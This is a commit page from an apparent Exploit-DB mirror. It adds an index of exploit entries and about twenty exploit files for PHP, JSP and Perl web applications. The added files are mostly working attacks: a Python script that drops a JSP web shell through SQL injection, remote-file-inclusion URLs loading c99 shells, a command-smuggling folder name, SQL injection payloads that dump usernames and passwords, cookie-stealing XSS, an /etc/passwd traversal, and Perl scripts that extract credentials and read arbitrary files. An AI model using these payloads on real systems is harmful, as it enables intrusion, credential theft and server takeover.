bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

Updated 03_07_2014

Browse source
This commit is contained in:
Offensive Security 2014-03-07 04:28:39 +00:00
parent 58e6a9f5be
commit f21446479d
23 changed files with 2061 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

22
files.csv
View file

@ -28665,6 +28665,7 @@ id,file,description,date,author,platform,type,port
31871,platforms/asp/webapps/31871.txt,"Te Ecard - 'id' Parameter Multiple SQL Injection Vulnerabilities",2008-06-02,"Ugurcan Engyn",asp,webapps,0
31872,platforms/multiple/dos/31872.py,"NASA Ames Research Center BigView 1.8 - (.PNM File) Stack-Based Buffer Overflow Vulnerability",2008-06-04,"Alfredo Ortega",multiple,dos,0
31873,platforms/windows/remote/31873.xml,"HP Instant Support 1.0.22 - 'HPISDataManager.dll' 'ExtractCab' ActiveX Control Buffer Overflow Vulnerability",2008-06-03,"Dennis Rand",windows,remote,0
31874,platforms/jsp/webapps/31874.py,"Ganib Project Management 2.3 - SQL Injection",2014-02-24,drone,jsp,webapps,80
31875,platforms/linux/remote/31875.py,"Python socket.recvfrom_into() - Remote Buffer Overflow",2014-02-24,Sha0,linux,remote,0
31876,platforms/windows/dos/31876.xml,"HP Instant Support 1.0.22 - 'HPISDataManager.dll' 'StartApp' ActiveX Control Insecure Method Vulnerability",2008-06-03,"Dennis Rand",windows,dos,0
31877,platforms/windows/dos/31877.xml,"HP Instant Support 1.0.22 - 'HPISDataManager.dll' 'RegistryString' Buffer Overflow Vulnerability",2008-06-04,"Dennis Rand",windows,dos,0
@ -28774,6 +28775,7 @@ id,file,description,date,author,platform,type,port
31986,platforms/php/webapps/31986.txt,"Wordpress VideoWhisper 4.27.3 - Multiple Vulnerabilities",2014-02-28,"High-Tech Bridge SA",php,webapps,80
31987,platforms/windows/remote/31987.rb,"GE Proficy CIMPLICITY gefebt.exe Remote Code Execution",2014-02-28,metasploit,windows,remote,80
31988,platforms/windows/local/31988.rb,"Total Video Player 1.3.1 (Settings.ini) - SEH Buffer Overflow",2014-02-28,metasploit,windows,local,0
31989,platforms/php/webapps/31989.txt,"webERP 4.11.3 (SalesInquiry.php, SortBy param) - SQL Injection Vulnerability",2014-02-28,HauntIT,php,webapps,80
31990,platforms/multiple/webapps/31990.txt,"SpagoBI 4.0 - Privilege Escalation Vulnerability",2014-02-28,"Christian Catalano",multiple,webapps,0
31991,platforms/windows/local/31991.rb,"VCDGear 3.50 (.cue) - Stack Buffer Overflow Exploit",2014-02-28,Provensec,windows,local,0
31992,platforms/windows/webapps/31992.txt,"Oracle Demantra 12.2.1 - Arbitrary File Disclosure",2014-03-01,Portcullis,windows,webapps,0
@ -28850,3 +28852,23 @@ id,file,description,date,author,platform,type,port
32069,platforms/php/webapps/32069.txt,"Claroline 1.8.9 wiki/wiki.php URL XSS",2008-07-15,"Digital Security Research Group",php,webapps,0
32070,platforms/php/webapps/32070.txt,"Claroline 1.8.9 work/work.php URL XSS",2008-07-15,"Digital Security Research Group",php,webapps,0
32071,platforms/php/webapps/32071.txt,"Claroline 1.8.9 claroline/redirector.php url Variable Arbitrary Site Redirect",2008-07-15,"Digital Security Research Group",php,webapps,0
32074,platforms/windows/local/32074.rb,"ALLPlayer M3U Buffer Overflow",2014-03-05,metasploit,windows,local,0
32075,platforms/php/webapps/32075.txt,"OpenDocMan 1.2.7 - Multiple Vulnerabilities",2014-03-05,"High-Tech Bridge SA",php,webapps,80
32076,platforms/php/webapps/32076.txt,"Ilch CMS 2.0 - Persistent XSS Vulnerability",2014-03-05,"High-Tech Bridge SA",php,webapps,80
32077,platforms/php/webapps/32077.txt,"IBS 0.15 'username' Parameter Cross Site Scripting Vulnerability",2008-07-17,Cyb3r-1sT,php,webapps,0
32078,platforms/php/webapps/32078.php,"Community CMS 0.1 'include.php' Remote File Include Vulnerability",2008-07-17,N3TR00T3R,php,webapps,0
32079,platforms/php/webapps/32079.txt,"CreaCMS edition_article/edition_article.php cfg[document_uri] Parameter Remote File Inclusion",2008-07-18,Ciph3r,php,webapps,0
32080,platforms/php/webapps/32080.txt,"CreaCMS fonctions/get_liste_langue.php cfg[base_uri_admin] Parameter Remote File Inclusion",2008-07-18,Ciph3r,php,webapps,0
32081,platforms/php/webapps/32081.txt,"Lemon CMS 1.10 'browser.php' Local File Include Vulnerability",2008-07-18,Ciph3r,php,webapps,0
32082,platforms/php/webapps/32082.txt,"Def_Blog 1.0.3 comaddok.php article Parameter SQL Injection",2008-07-18,"CWH Underground",php,webapps,0
32083,platforms/php/webapps/32083.txt,"Def_Blog 1.0.3 comlook.php article Parameter SQL Injection",2008-07-18,"CWH Underground",php,webapps,0
32084,platforms/multiple/remote/32084.txt,"SmbClientParser 2.7 Perl Module Remote Command Execution Vulnerability",2008-07-18,"Jesus Olmos Gonzalez",multiple,remote,0
32085,platforms/php/webapps/32085.txt,"phpFreeChat 1.1 'demo21_with_hardocded_urls.php' Cross Site Scripting Vulnerability",2008-07-18,ahmadbady,php,webapps,0
32086,platforms/multiple/dos/32086.c,"SWAT 4 Multiple Denial Of Service Vulnerabilities",2008-07-20,"Luigi Auriemma",multiple,dos,0
32087,platforms/php/webapps/32087.txt,"EasyBookMarker 4.0 'ajaxp_backend.php' Cross-Site Scripting Vulnerability",2008-07-21,Dr.Crash,php,webapps,0
32088,platforms/php/webapps/32088.pl,"EasyDynamicPages 3.0 Multiple SQL Injection and Cross-Site Scripting Vulnerabilities",2008-07-21,Dr.Crash,php,webapps,0
32089,platforms/php/webapps/32089.pl,"EasyPublish 3.0 'read' Parameter Multiple SQL Injection and Cross-Site Vulnerabilities",2008-07-21,Dr.Crash,php,webapps,0
32090,platforms/php/webapps/32090.txt,"Maran PHP Blog 'comments.php' Cross-Site Scripting Vulnerability",2008-07-21,Dr.Crash,php,webapps,0
32091,platforms/php/webapps/32091.txt,"MyBlog 0.9.8 Multiple Remote Information Disclosure Vulnerabilities",2008-07-21,"AmnPardaz Security Research Team",php,webapps,0
32092,platforms/php/webapps/32092.txt,"Flip 3.0 'config.php' Remote File Include Vulnerability",2008-07-21,Cru3l.b0y,php,webapps,0
32093,platforms/php/webapps/32093.txt,"phpKF 'forum_duzen.php' SQL Injection Vulnerability",2008-07-21,U238,php,webapps,0

Can't render this file because it is too large.

71
platforms/jsp/webapps/31874.py Executable file
View file

@ -0,0 +1,71 @@
# Exploit title: Ganib 2.x SQLi
# Date: 02/02/2014
# Exploit author: drone (@dronesec)
# More information: http://forelsec.blogspot.com/2014/02/ganib-project-management-23-multiple.html
# Vendor homepage: http://www.ganib.com/
# Software link: http://downloads.sourceforge.net/project/ganib/Ganib-2.0/Ganib-2.0_with_jre.zip
# Version: <= 2.3
# Fixed in: 2.4
# Tested on: Ubuntu 12.04 (apparmor disabled) / WinXP SP3
from argparse import ArgumentParser
import sys
import string
import random
import requests
""" Ganib 2.0 preauth SQLi PoC
@dronesec
"""
def loadJSP(options):
data = ''
try:
with open(options.jsp) as f:
for line in f.readlines():
data += line.replace("\"", "\\\"").replace('\n', '')
except Exception, e:
print e
sys.exit(1)
return data
def run(options):
print '[!] Dropping %s on %s...' % (options.jsp, options.ip)
url = "http://{0}:8080/LoginProcessing.jsp".format(options.ip)
shell = ''.join(random.choice(string.ascii_lowercase+string.digits) for x in range(5))
exploit = '1 UNION SELECT "{0}","1","2","3" INTO OUTFILE "{1}"'
exploit = exploit.format(loadJSP(options), options.path + '/%s.jsp' % shell)
data = { "theAction" : "submit",
"J_USERNAME" : "test",
"J_PASSWORD" : "test",
"language" : "en",
"remember_checkbox" : "on",
"userDomain" : exploit
}
res = requests.post(url, data=data)
if res.status_code is 200:
print '[!] Dropped at /{0}.jsp'.format(shell)
else:
print '[!] Failed to drop JSP (HTTP {0})'.format(res.status_code)
def parse():
parser = ArgumentParser()
parser.add_argument("-i", help='Server ip address', action='store', dest='ip',
required=True)
parser.add_argument("-p", help='Writable web path (/var/www/ganib)', dest='path',
action='store', default='/var/www/ganib')
parser.add_argument("-j", help="JSP to deploy", dest='jsp', action='store')
options = parser.parse_args()
options.path = options.path if options.path[-1] != '/' else options.path[:-1]
return options
if __name__ == "__main__":
run(parse())

1125
platforms/multiple/dos/32086.c Executable file
View file

File diff suppressed because it is too large Load diff

13
platforms/multiple/remote/32084.txt Executable file
View file

@ -0,0 +1,13 @@
source: http://www.securityfocus.com/bid/30290/info
The SmbClientParser Perl module is prone to a remote command-execution vulnerability because it fails to sufficiently sanitize user-supplied data.
Successfully exploiting this issue will allow an attacker to execute arbitrary commands with the privileges of the user running applications that use the module.
Filesys::SmbClientParser 2.7 is vulnerable; other versions may also be affected.
Name a folder the following:
' x && xterm &#
A shared folder containing this named folder will execute the following command:
/usr/bin/smbclient "//x.x.x.x/vulns" -U "user%pass" -d0 -c 'cd "'x && xterm &#"' -D "/poc"

26
platforms/php/webapps/31989.txt Executable file
View file

@ -0,0 +1,26 @@
# ==============================================================
# Title ...| SQL Injection in webERP
# Version .| 4.11.3
# Date ....| 28.02.2014
# Found ...| HauntIT Blog
# Home ....| http://www.weberp.org
# ==============================================================
# ==============================================================
# SQL Injection
---<request>---
POST /k/cms/erp/webERP/SalesInquiry.php HTTP/1.1
Host: 10.149.14.62
(...)
Content-Length: 391
FormID=09607700a0e7ff0699503963022b5ae0944cd0bc&ReportType=Detail&OrderType=0&DateType=Order&InvoiceType=All&FromDate=01%2F02%2F2014&ToDate=28%2F02%2F2014&PartNumberOp=Equals&PartNumber=&DebtorNoOp=Equals&DebtorNo=&DebtorNameOp=LIKE&DebtorName=&OrderNo=&LineStatus=All&Category=All&Salesman=All&Area=All&SortBy= FormID=09607700a0e7ff0699503963022b5ae0944cd0bc&ReportType=Detail&OrderType=0&DateType=Order&InvoiceType=All&FromDate=01/02/2014&ToDate=28/02/2014&PartNumberOp=Equals&PartNumber=&DebtorNoOp=Equals&DebtorNo=&DebtorNameOp=LIKE&DebtorName=&OrderNo=&LineStatus=All&Category=All&Salesman=All&Area=All&SortBy='TADAAAM;]&SummaryType=orderno&submit=Run Inquiry&SummaryType=orderno&submit=Run+Inquiry
---<request>---
# ==============================================================
# More @ http://HauntIT.blogspot.com
# Thanks! ;)
# o/

71
platforms/php/webapps/32075.txt Executable file
View file

@ -0,0 +1,71 @@
Advisory ID: HTB23202
Product: OpenDocMan
Vendor: Free Document Management Software
Vulnerable Version(s): 1.2.7 and probably prior
Tested Version: 1.2.7
Advisory Publication: February 12, 2014 [without technical details]
Vendor Notification: February 12, 2014
Vendor Patch: February 24, 2014
Public Disclosure: March 5, 2014
Vulnerability Type: SQL Injection [CWE-89], Improper Access Control [CWE-284]
CVE References: CVE-2014-1945, CVE-2014-1946
Risk Level: High
CVSSv2 Base Scores: 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P), 6.5 (AV:N/AC:L/Au:S/C:P/I:P/A:P)
Solution Status: Fixed by Vendor
Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ )
------------------------------------------------------------------------
-----------------------
Advisory Details:
High-Tech Bridge Security Research Lab discovered multiple vulnerabilities in OpenDocMan, which can be exploited to perform SQL Injection and gain administrative access to the application.
1) SQL Injection in OpenDocMan: CVE-2014-1945
The vulnerability exists due to insufficient validation of "add_value" HTTP GET parameter in "/ajax_udf.php" script. A remote unauthenticated attacker can execute arbitrary SQL commands in application's database.
The exploitation example below displays version of the MySQL server:
http://[host]/ajax_udf.php?q=1&add_value=odm_user%20UNION%20SELECT%201,v
ersion%28%29,3,4,5,6,7,8,9
2) Improper Access Control in OpenDocMan: CVE-2014-1946
The vulnerability exists due to insufficient validation of allowed action in "/signup.php" script when updating userâ??s profile. A remote authenticated attacker can assign administrative privileges to the current account and gain complete control over the application.
The exploitation example below assigns administrative privileges for the current account:
<form action="http://[host]/signup.php" method="post" name="main">
<input type="hidden" name="updateuser" value="1">
<input type="hidden" name="admin" value="1">
<input type="hidden" name="id" value="[USER_ID]">
<input type="submit" name="login" value="Run">
</form>
------------------------------------------------------------------------
-----------------------
Solution:
Update to OpenDocMan v1.2.7.2
More Information:
http://www.opendocman.com/opendocman-v1-2-7-1-release/
http://www.opendocman.com/opendocman-v1-2-7-2-released/
------------------------------------------------------------------------
-----------------------
References:
[1] High-Tech Bridge Advisory HTB23202 - https://www.htbridge.com/advisory/HTB23202 - Multiple vulnerabilities in OpenDocMan.
[2] OpenDocMan - http://www.opendocman.com/ - Open Source Document Management System written in PHP.
[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures.
[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types.
[5] ImmuniWeb® - http://www.htbridge.com/immuniweb/ - is High-Tech Bridge's proprietary web application security assessment solution with SaaS delivery model that combines manual and automated vulnerability testing.
------------------------------------------------------------------------
-----------------------
Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.

64
platforms/php/webapps/32076.txt Executable file
View file

@ -0,0 +1,64 @@
Advisory ID: HTB23203
Product: Ilch CMS
Vendor: http://ilch.de
Vulnerable Version(s): 2.0 and probably prior
Tested Version: 2.0
Advisory Publication: February 12, 2014 [without technical details]
Vendor Notification: February 12, 2014
Public Disclosure: March 5, 2014
Vulnerability Type: Cross-Site Scripting [CWE-79]
CVE Reference: CVE-2014-1944
Risk Level: Medium
CVSSv2 Base Score: 5 (AV:N/AC:L/Au:N/C:N/I:P/A:N)
Solution Status: Fixed by Vendor
Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ )
------------------------------------------------------------------------
-----------------------
Advisory Details:
High-Tech Bridge Security Research Lab discovered vulnerability in Ilch CMS, which can be exploited to perform Cross-Site Scripting (XSS) attacks against users and administrators of vulnerable application.
1) Cross-Site Scripting (XSS) in Ilch CMS: CVE-2014-1944
The vulnerability exists due to insufficient sanitisation of user-supplied data in "text" HTTP POST parameter passed to "/index.php/guestbook/index/newentry" URL. A remote unauthenticated user can send a specially crafted HTTP POST request, which allows to permanently inject and execute arbitrary HTML and script code in userâ??s browser in context of the vulnerable website when the victim visits the "http://[host]/index.php/guestbook/index/index" URL.
The exploitation example below uses the JavaScript "alert()" function to display "immuniweb" word:
POST /index.php/guestbook/index/newentry HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 151
ilch_token=5a528778359d4756b9b8803b48fba18b&name=name&email=email%40emai
l.com&homepage=http%3A%2F%2Fsite.com&text=<script>alert('immuniwweb');</
script>&saveEntry=Submit
------------------------------------------------------------------------
-----------------------
Solution:
Fixed by vendor on February 18, 2014 directly in the source code without version modification/new release. Update to the version 2.0 released after February 18, 2014.
More Information:
https://github.com/IlchCMS/Ilch-2.0/commit/381e15f39d07d3cdf6aaaa25c0f23
21f817935f7
https://github.com/IlchCMS/Ilch-2.0/commit/02bb4953c0e21cb8f20e5e91db5e1
5a77fe1a5ce
------------------------------------------------------------------------
-----------------------
References:
[1] High-Tech Bridge Advisory HTB23203 - https://www.htbridge.com/advisory/HTB23203 - Cross-Site Scripting (XSS) in Ilch CMS.
[2] Ilch CMS - http://ilch.de - Ilch is an easy to use content management system for clans, communities and homepages.
[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures.
[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types.
[5] ImmuniWeb® - http://www.htbridge.com/immuniweb/ - is High-Tech Bridge's proprietary web application security assessment solution with SaaS delivery model that combines manual and automated vulnerability testing.
------------------------------------------------------------------------
-----------------------
Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.

9
platforms/php/webapps/32077.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/30270/info
IBS is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
IBS 0.15 is vulnerable; other versions may also be affected. The IBSng branch of the application is not vulnerable.
http://www.example.com/ibs/admin/index.php?username=<script>alert(document.cookie)</script>&password=a&B1=Submit

41
platforms/php/webapps/32078.php Executable file
View file

@ -0,0 +1,41 @@
source: http://www.securityfocus.com/bid/30275/info
Community CMS is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied data.
An attacker can exploit this issue to execute malicious PHP code in the context of the webserver process. This may allow the attacker to compromise the application and the underlying system; other attacks are also possible.
Community CMS 0.1 is vulnerable; other versions may also be affected.
<?php
/************************************************** ********************
*[+] << IN THE NAME OF GOD >>
*[+]
*[+]
*[+] [ Persian Boys Hacking Team ] -:- 2008 -:- IRAN
*[+] -
*[+] - discovered by N3TR00T3R [at] Y! [dot] com
*[+] - communitycms-0.1 Remote File Includion
*[+] - download :http://sourceforge.net/project/showf...roup_id=223968
*[+] - sp tnx : Sp3shial,Veroonic4,God_Master_hacker,a_reptil,Ciph
3r,shayan_cmd
*[+] r00t.master,Dr.root,Pouya_server,Spyn3t,LordKouros h,123qwe,mr.n4ser
*[+] Zahacker,goli_boya,i_reza_i,programer, and all irchatan members ...
*[+]
************************************************** ********************/
#if register_globals = On;
$shell="http://localhost/syn99.php?"; // your shell
$target="http://localhost/communitycms/include.php"; //vul page --->
include.php
echo"<html>
<body>
<form action=$target method=POST>
SECURITY :<input type=text name=security>
SHELL :<input type=text name=root>
<input type=hidden name=security value=1>
<input type=hidden name=root value=$shell>
<input type=submit value=ok>
</form>
</body>
</html>";
?>

9
platforms/php/webapps/32079.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/30284/info
CreaCMS is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues can allow an attacker to compromise the application and the underlying system; other attacks are also possible.
CreaCMS 1 is vulnerable; other versions may also be affected.
http://www.example.com/creacms/_administration/edition_article/edition_article.php?cfg[document_uri]=http://127.0.0.1/c99.php?

9
platforms/php/webapps/32080.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/30284/info
CreaCMS is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues can allow an attacker to compromise the application and the underlying system; other attacks are also possible.
CreaCMS 1 is vulnerable; other versions may also be affected.
http://www.example.com/creacms/_administration/fonctions/get_liste_langue.php?cfg[base_uri_admin]=http://127.0.0.1/c99.php?

9
platforms/php/webapps/32081.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/30285/info
Lemon CMS is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input.
An attacker can exploit this vulnerability using directory-traversal strings to view local files within the context of the webserver process. Information harvested may aid in further attacks.
Lemon CMS 1.10 is vulnerable; other versions may also be affected.
http://www.example.com/lemon_includes/FCKeditor/editor/filemanager/browser/browser.php?dir=../../../../../../../../../../etc/passwd

9
platforms/php/webapps/32082.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/30289/info
Def_Blog is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Def_Blog 1.0.3 is vulnerable; other versions may also be affected.
http://www.example.com/[def_blog_path]/comaddok.php?article=-1+union+select+1,concat(pseudo,0x3a3a,mdp)+from+def_user--

9
platforms/php/webapps/32083.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/30289/info
Def_Blog is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Def_Blog 1.0.3 is vulnerable; other versions may also be affected.
http://www.example.com/[def_blog_path]/comlook.php?article=-1+union+select+1,2,3,4,concat(pseudo,0x3a3a,mdp),6,7+from+def_user--

9
platforms/php/webapps/32085.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/30292/info
phpFreeChat is prone to an unspecified cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
phpFreeChat 1.1 is vulnerable; other versions may also be affected.
http://www.example.com/path/demo/demo21_with_hardcoded_urls.php/>'><ScRiPt>alert(document.cookie)</ScRiPt>

9
platforms/php/webapps/32087.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/30304/info
EasyBookMarker is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
EasyBookMarker 4.0tr is vulnerable; other versions may also be affected.
<html> <head></head> <body onLoad=javascript:document.form.submit()> <form action="http://www.example.com/zomplog/ajaxp_backend.php" method="POST" name="form"> <input type="hidden" name="rs" value="&#x22;&#x20; <script>alert(document.cookie)</script>"> </form> </body> </html>

210
platforms/php/webapps/32088.pl Executable file
View file

@ -0,0 +1,210 @@
source: http://www.securityfocus.com/bid/30305/info
EasyDynamicPages is prone to multiple input-validation vulnerabilities, including an SQL-injection issue and a cross-site scripting issue, because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
EasyDynamicPages 3.0tr is vulnerable; other versions may also be affected.
#!/usr/bin/perl
#----------------------------------------------------------------
#
#Script : Easydynamicpages 30tr
#
#Type : Multipe Vulerabilities ( Xss / Sql Injection Exploit / File
Disclosure Exploit )
#
#Variable Method : GET
#
#Alert : High
#
#----------------------------------------------------------------
#
#Discovered by : Khashayar Fereidani a.k.a. Dr.Crash
#
#My Offical Website : HTTP://FEREIDANI.IR
#
#Khashayar Fereidani Email : irancrash [ a t ] gmail [ d o t] com
#
#----------------------------------------------------------------
#
#Khashayar Fereidani Offical Website : HTTP://FEREIDANI.IR
#
#----------------------------------------------------------------
#
#Script Download :
http://myiosoft.com/download/EasyDynamicPages/easydynamicpages-30tr.zip
#
#----------------------------------------------------------------
#
#Xss 1 :
http://Example/staticpages/easycalendar/index.php?PageSection=1&month=4&year=<script>alert(document.cookie);</script>
#
#----------------------------------------------------------------
#
#SQL Injection :
#
#SQL 1 :
http://Example/dynamicpages/index.php?page=individual&table=edp_Help_Internal_News&read=1+union/**/select/**/0,1,2,3,concat(0x4c6f67696e3a,puUsername,0x3c656e64757365723e,0x0d0a50617373776f72643a,puPassword,0x3c656e64706173733e),5,6/**/from/**/edp_puusers/*
#
#
#----------------------------------------------------------------
#
# Tnx : God
#
# HTTP://IRCRASH.COM
#
#----------------------------------------------------------------
use LWP;
use HTTP::Request;
use Getopt::Long;
sub header
{
print "
****************************************************
* Easydynamicpages 30tr Exploit *
****************************************************
*Discovered by : Khashayar Fereidani *
*Exploited by : Khashayar Fereidani *
*My Official Website : http://fereidani.ir *
****************************************************";
}
sub usage
{
print "
* Usage : perl $0 http://Example/
****************************************************
";
}
$url = ($ARGV[0]);
if(!$url)
{
header();
usage();
exit;
}
if($url !~ /\//){$url = $url."/";}
if($url !~ /http:\/\//){$url = "http://".$url;}
sub xpl1()
{
$vul =
"/dynamicpages/index.php?page=individual&table=edp_Help_Internal_News&read=1+union/**/select/**/0,1,2,3,concat(0x4c6f67696e3a,puUsername,0x3c656e64757365723e,0x0d0a50617373776f72643a,puPassword,0x3c656e64706173733e),5,6/**/from/**/edp_puusers/*";
$requestpage = $url.$vul;
my $req = HTTP::Request->new("POST",$requestpage);
$ua = LWP::UserAgent->new;
$ua->agent( 'Mozilla/5.0 Gecko/20061206 Firefox/1.5.0.9' );
#$req->referer($url);
$req->referer("IRCRASH.COM");
$req->content_type('application/x-www-form-urlencoded');
$req->header("content-length" => $contlen);
$req->content($poststring);
$response = $ua->request($req);
$content = $response->content;
$header = $response->headers_as_string();
@name = split(/Login:/,$content);
$name = @name[1];
@name = split(/<enduser>/,$name);
$name = @name[0];
@password = split(/Password:/,$content);
$password = @password[1];
@password = split(/<endpass>/,$password);
$password = @password[0];
if(!$name && !$password)
{
print "\n\n";
print "!Exploit failed ! :(\n\n";
exit;
}
print "\n Username: ".$name."\n\n";
print " Password: " .$password."\n\n";
}
#XPL2
sub xpl2()
{
print "\n Example For File Address : /home/user/public_html/config.php\n
Or /etc/passwd";
print "\n Enter File Address :";
$fil3 = <stdin>;
$vul =
"/dynamicpages/index.php?page=individual&table=edp_Help_Internal_News&read=1+union/**/select/**/0,1,2,3,concat(0x4c6f67696e3a,load_file('$fil3'),0x3c656e64757365723e),5,6/**/from/**/edp_puusers/*";
$requestpage = $url.$vul;
my $req = HTTP::Request->new("POST",$requestpage);
$ua = LWP::UserAgent->new;
$ua->agent( 'Mozilla/5.0 Gecko/20061206 Firefox/1.5.0.9' );
#$req->referer($url);
$req->referer("IRCRASH.COM");
$req->content_type('application/x-www-form-urlencoded');
$req->header("content-length" => $contlen);
$req->content($poststring);
$response = $ua->request($req);
$content = $response->content;
$header = $response->headers_as_string();
@name = split(/Login:/,$content);
$name = @name[1];
@name = split(/<enduser>/,$name);
$name = @name[0];
if(!$name && !$password)
{
print "\n\n";
print "!Exploit failed ! :(\n\n";
exit;
}
open (FILE, ">".source.".txt");
print FILE $name;
close (FILE);
print " File Save In source.txt\n";
print "";
}
#XPL2 END
#Starting;
print "
****************************************************
* Easydynamicpages 30tr Exploit *
****************************************************
*Discovered by : Khashayar Fereidani *
*Exploited by : Khashayar Fereidani *
*My Official Website : http://fereidani.ir *
****************************************************
* Mod Options : *
* Mod 1 : Find mysql username and root password *
* Mod 2 : Save PHP config source in your system *
****************************************************";
print "\n \n Enter Mod : ";
$mod=<stdin>;
if ($mod=="1" or $mod=="2") { print "\n Exploiting .............. \n"; }
else { print "\n Unknown Mod ! \n Exploit Failed !"; };
if ($mod=="1") { xpl1(); };
if ($mod=="2") { xpl2(); };

203
platforms/php/webapps/32089.pl Executable file
View file

@ -0,0 +1,203 @@
source: http://www.securityfocus.com/bid/30307/info
EasyPublish is prone to multiple input-validation vulnerabilities because it fails to sufficiently sanitize user-supplied data. The issues include SQL-injection and cross-site scripting vulnerabilities.
Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
EasyPublish 3.0tr is vulnerable; other versions may also be affected.
NOTE: This BID was originally titled 'EasyPublish Multiple Input Validation Vulnerabilities', but has been changed to better describe the issues.
#!/usr/bin/perl
#----------------------------------------------------------------
#
#Script : EasyPublish 3.0tr
#
#Type : Multiple Vulnerabilities ( Xss / Sql Injection Exploit / File Disclosure Exploit )
#
#Variable Method : GET
#
#Alert : High
#
#----------------------------------------------------------------
#
#Discovered by : Khashayar Fereidani a.k.a. Dr.Crash
#
#My Official Website : HTTP://FEREIDANI.IR
#
#Khashayar Fereidani Email : irancrash [ a t ] gmail [ d o t] com
#
#----------------------------------------------------------------
#
#Khashayar Fereidani Offical Website : HTTP://FEREIDANI.IR
#
#----------------------------------------------------------------
#
#Script Download : http://myiosoft.com/download/EasyPublish/easypublish-30tr.zip
#
#----------------------------------------------------------------
#
#Xss 1 : http://Example//staticpages/easypublish/index.php?PageSection=0&page=individual&table=edp_News&read=%<script>alert(document.cookie);</script>
#
#----------------------------------------------------------------
#
#SQL Injection :
#
#SQL 1 : http://Example/staticpages/easypublish/index.php?PageSection=0&table=edp_News&page=individual&fage=search&read=1+union+all+select+1,concat(0x4c6f67696e3a,puUsername,0x3c656e64757365723e,0x0d0a50617373776f72643a,puPassword,0x3c656e64706173733e),3,4,1,5+FROM+edp_puusers/*;--
#
#
#----------------------------------------------------------------
#
# Tnx : God
#
# HTTP://IRCRASH.COM
#
#----------------------------------------------------------------
use LWP;
use HTTP::Request;
use Getopt::Long;
sub header
{
print "
****************************************************
* EasyPublish 3.0tr Exploit *
****************************************************
*Discovered by : Khashayar Fereidani *
*Exploited by : Khashayar Fereidani *
*My Official Website : http://fereidani.ir *
****************************************************";
}
sub usage
{
print "
* Usage : perl $0 http://Example/
****************************************************
";
}
$url = ($ARGV[0]);
if(!$url)
{
header();
usage();
exit;
}
if($url !~ /\//){$url = $url."/";}
if($url !~ /http:\/\//){$url = "http://".$url;}
sub xpl1()
{
$vul = "/staticpages/easypublish/index.php?PageSection=0&table=edp_News&page=individual&fage=search&read=1+union+all+select+1,concat(0x4c6f67696e3a,puUsername,0x3c656e64757365723e,0x0d0a50617373776f72643a,puPassword,0x3c656e64706173733e),3,4,1,5+FROM+edp_puusers/*";
$requestpage = $url.$vul;
my $req = HTTP::Request->new("POST",$requestpage);
$ua = LWP::UserAgent->new;
$ua->agent( 'Mozilla/5.0 Gecko/20061206 Firefox/1.5.0.9' );
#$req->referer($url);
$req->referer("IRCRASH.COM");
$req->content_type('application/x-www-form-urlencoded');
$req->header("content-length" => $contlen);
$req->content($poststring);
$response = $ua->request($req);
$content = $response->content;
$header = $response->headers_as_string();
@name = split(/Login:/,$content);
$name = @name[1];
@name = split(/<enduser>/,$name);
$name = @name[0];
@password = split(/Password:/,$content);
$password = @password[1];
@password = split(/<endpass>/,$password);
$password = @password[0];
